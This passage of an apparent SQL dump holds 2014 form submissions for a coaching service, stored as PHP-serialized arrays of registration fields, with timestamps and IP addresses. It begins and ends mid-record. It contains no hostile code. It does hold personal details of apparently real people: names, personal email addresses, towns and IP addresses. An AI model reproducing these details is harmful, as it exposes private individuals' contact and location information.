Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"F";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada PT";}i:10;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:11;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"14";}i:12;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:21:"Choose a Practitioner";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-03-21 11:30:42', '72.224.245.88', '1'),
(3, 1, 'a:13:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:4:"beth";}i:3;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:4;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:5:"hiram";}i:5;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"bethlesko@gmail.com";}i:6;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:2:"Th";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada PT";}i:10;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:11;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"14";}i:12;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:21:"Choose a Practitioner";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-03-21 11:33:16', '72.224.245.88', '1'),
(4, 1, 'a:13:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:4:"beth";}i:3;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:4;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:5:"hiram";}i:5;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"bethlesko@gmail.com";}i:6;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:2:"Th";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada PT";}i:10;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:11;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"14";}i:12;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:21:"Choose a Practitioner";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-03-21 11:34:12', '72.224.245.88', '1'),
(5, 1, 'a:18:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:4:"beth";}i:3;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:4;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:5:"hiram";}i:5;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"bethlesko@gmail.com";}i:6;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:2:"Th";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:23:"Mid-day (11 am to 2 pm)";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada PT";}i:10;a:7:{s:2:"id";s:2:"32";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:22:"Choose a Practitioner.";s:4:"type";s:8:"checkbox";s:7:"options";s:95:"a:2:{i:0;s:36:"Please Choose a Practitioner for Me.";i:1;s:29:"Let Me Choose a Practitioner.";}";s:9:"parent_id";s:1:"0";s:5:"value";s:29:"Let Me Choose a Practitioner.";}i:11;a:7:{s:2:"id";s:2:"25";s:4:"slug";s:10:"1st-choice";s:4:"name";s:10:"1st choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:12:"Lion Goodman";}i:12;a:7:{s:2:"id";s:2:"26";s:4:"slug";s:10:"2nd-choice";s:4:"name";s:10:"2nd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:4:"Stan";}i:13;a:7:{s:2:"id";s:2:"27";s:4:"slug";s:10:"3rd-choice";s:4:"name";s:10:"3rd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:5:"admin";}i:14;a:7:{s:2:"id";s:2:"29";s:4:"slug";s:6:"userid";s:4:"name";s:6:"userid";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"1";}i:15;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:16;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"14";}i:17;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:6:"submit";s:4:"name";s:6:"Submit";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-03-21 17:18:32', '72.224.245.88', '1'),
(6, 1, 'a:18:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:4:"beth";}i:3;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:4;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:5:"hiram";}i:5;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"bethlesko@gmail.com";}i:6;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"W";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 pm)";}";s:9:"parent_id";s:1:"0";s:5:"value";s:23:"Mid-day (11 am to 2 pm)";}i:9;a:7:{s:2:"id";s:2:"13";s:4:"slug";s:9:"time-zone";s:4:"name";s:9:"Time Zone";s:4:"type";s:6:"select";s:7:"options";s:1242:"a:24:{i:0;s:14:"U.S./Canada PT";i:1;s:14:"U.S./Canada MT";i:2;s:14:"U.S./Canada CT";i:3;s:14:"U.S./Canada ET";i:4;s:35:"Europe Azores Time Zone (UTC-01:00)";i:5;s:43:"Europe Greenwich Mean Time Zone (UTC+00:00)";i:6;s:45:"Europe Central European Time Zone (UTC+01:00)";i:7;s:53:"Europe Further-eastern European Time Zone (UTC+03:00)";i:8;s:45:"Europe Eastern European Time Zone (UTC+02:00)";i:9;s:35:"Europe Moscow Time Zone (UTC+04:00)";i:10;s:74:"Australia Mawson Station, Heard and McDonald Islands Time Zone (UTC+05:00)";i:11;s:45:"Australia Cocos Islands Time Zone (UTC+06:30)";i:12;s:55:"Australia Davis, Christmas Island Time Zone (UTC+07:00)";i:13;s:50:"Australia Australian Western Time Zone (UTC+08:00)";i:14;s:51:"Asia Israel, Eastern European Time Zone (UTC+02:00)";i:15;s:31:"Asia Iran Time Zone (UTC+03:30)";i:16;s:43:"Asia Azerbaijan, Gulf Time Zone (UTC+04:00)";i:17;s:52:"South America Paraguay, Amazon Time Zone (UTC-04:00)";i:18;s:33:"Asia Arabia Time Zone (UTC+03:00)";i:19;s:39:"Africa Cape Verde Time Zone (UTC-01:00)";i:20;s:40:"Africa West Africa Time Zone (UTC+01:00)";i:21;s:59:"South America Ecuador, Peru, Columbia Time Zone (UTC-05:00)";i:22;s:45:"South America Venezuela Time Zone (UTC-04:30)";i:23;s:5:"Other";}";s:9:"parent_id";s:1:"0";s:5:"value";s:14:"U.S./Canada PT";}i:10;a:7:{s:2:"id";s:2:"32";s:4:"slug";s:21:"choose-a-practitioner";s:4:"name";s:22:"Choose a Practitioner.";s:4:"type";s:8:"checkbox";s:7:"options";s:95:"a:2:{i:0;s:36:"Please Choose a Practitioner for Me.";i:1;s:29:"Let Me Choose a Practitioner.";}";s:9:"parent_id";s:1:"0";s:5:"value";s:29:"Let Me Choose a Practitioner.";}i:11;a:7:{s:2:"id";s:2:"25";s:4:"slug";s:10:"1st-choice";s:4:"name";s:10:"1st choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:13:"Walter Rieger";}i:12;a:7:{s:2:"id";s:2:"26";s:4:"slug";s:10:"2nd-choice";s:4:"name";s:10:"2nd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:17:"Virginia McKinnie";}i:13;a:7:{s:2:"id";s:2:"27";s:4:"slug";s:10:"3rd-choice";s:4:"name";s:10:"3rd choice";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:10:"Tom Rausch";}i:14;a:7:{s:2:"id";s:2:"29";s:4:"slug";s:6:"userid";s:4:"name";s:6:"userid";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:1:"1";}i:15;a:7:{s:2:"id";s:1:"2";s:4:"slug";s:12:"verification";s:4:"name";s:12:"Verification";s:4:"type";s:12:"verification";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:16;a:7:{s:2:"id";s:1:"3";s:4:"slug";s:27:"please-enter-any-two-digits";s:4:"name";s:27:"Please enter any two digits";s:4:"type";s:6:"secret";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:2:"14";}i:17;a:7:{s:2:"id";s:1:"4";s:4:"slug";s:6:"submit";s:4:"name";s:6:"Submit";s:4:"type";s:6:"submit";s:7:"options";s:0:"";s:9:"parent_id";s:1:"2";s:5:"value";s:0:"";}}', 'CYB Plan Ordered', 'Clear Your Beliefs', 'blesko@leskowebengineering.com', 'a:1:{i:0;s:0:"";}', '2014-05-15 10:04:01', '72.224.247.186', '1'),
(7, 1, 'a:18:{i:0;a:7:{s:2:"id";s:1:"1";s:4:"slug";s:8:"register";s:4:"name";s:8:"Register";s:4:"type";s:8:"fieldset";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:1;a:7:{s:2:"id";s:2:"21";s:4:"slug";s:16:"your-information";s:4:"name";s:16:"Your Information";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:2;a:7:{s:2:"id";s:1:"5";s:4:"slug";s:10:"first-name";s:4:"name";s:10:"First Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:6:"Sharon";}i:3;a:7:{s:2:"id";s:1:"6";s:4:"slug";s:9:"last-name";s:4:"name";s:9:"Last Name";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:9:"Wainscott";}i:4;a:7:{s:2:"id";s:1:"7";s:4:"slug";s:4:"city";s:4:"name";s:4:"City";s:4:"type";s:4:"text";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:10:"Belleville";}i:5;a:7:{s:2:"id";s:2:"22";s:4:"slug";s:5:"email";s:4:"name";s:5:"Email";s:4:"type";s:5:"email";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:19:"cressmgmt@gmail.com";}i:6;a:7:{s:2:"id";s:2:"17";s:4:"slug";s:28:"coaching-daytime-preferences";s:4:"name";s:29:"Coaching Day/Time Preferences";s:4:"type";s:7:"section";s:7:"options";s:0:"";s:9:"parent_id";s:1:"0";s:5:"value";s:0:"";}i:7;a:7:{s:2:"id";s:2:"11";s:4:"slug";s:22:"good-days-for-coaching";s:4:"name";s:22:"Good Days for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:93:"a:7:{i:0;s:1:"M";i:1;s:1:"T";i:2;s:1:"W";i:3;s:2:"Th";i:4;s:1:"F";i:5;s:2:"Sa";i:6;s:2:"Su";}";s:9:"parent_id";s:1:"0";s:5:"value";s:22:"M, T, W, Th, F, Sa, Su";}i:8;a:7:{s:2:"id";s:2:"12";s:4:"slug";s:23:"good-times-for-coaching";s:4:"name";s:23:"Good Times for Coaching";s:4:"type";s:8:"checkbox";s:7:"options";s:147:"a:4:{i:0;s:23:"Morning (8 am to 11 am)";i:1;s:23:"Mid-day (11 am to 2 pm)";i:2;s:24:"Afternoon (2 pm to 6 pm)";i:3;s:23:"Evening (6 pm to 10 